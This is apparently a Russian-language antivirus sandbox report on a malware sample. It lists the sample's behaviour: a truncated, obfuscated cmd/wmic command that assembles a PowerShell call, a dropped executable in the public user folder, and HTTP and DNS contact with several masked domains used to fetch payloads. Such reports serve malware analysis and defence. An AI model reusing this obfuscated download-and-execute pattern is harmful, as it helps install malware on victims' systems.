Техническая информация
Вредоносные функции
Запускает на исполнение (эксплоит)
- '<SYSTEM32>\cmd.exe' wmic & %comspec% /v /c set %NVsbwAzvwQtZwiM%=wiwNsUGbR&&set %BodjosKuS%=w^er^s&&set %OibhaZfCwzzZaJC%=hwvVkrkNO&&set %aOptHPUwv%=p^o&&set %FdjBRwbHuaNOZSV%=YlqczlmWZujwYkr&&set %o...
Изменения в файловой системе
Создает следующие файлы
- C:\users\public\238007.exe
Сетевая активность
Подключается к
- 'be##t.biz':80
- 're####-shlangov.ru':80
- 'le####licidad.com':80
TCP
Запросы HTTP GET
- http://be##t.biz/esuBzzmU/
- http://re####-shlangov.ru/Q/
- http://www.le####licidad.com/jtvsZO/
UDP
- DNS ASK a2###ntures.in
- DNS ASK be##t.biz
- DNS ASK re###t-britv.ru
- DNS ASK re####-shlangov.ru
- DNS ASK le####licidad.com
Другое
Создает и запускает на исполнение
- '<SYSTEM32>\cmd.exe' wmic & %comspec% /v /c set %NVsbwAzvwQtZwiM%=wiwNsUGbR&&set %BodjosKuS%=w^er^s&&set %OibhaZfCwzzZaJC%=hwvVkrkNO&&set %aOptHPUwv%=p^o&&set %FdjBRwbHuaNOZSV%=YlqczlmWZujwYkr&&set %o...' (со скрытым окном)
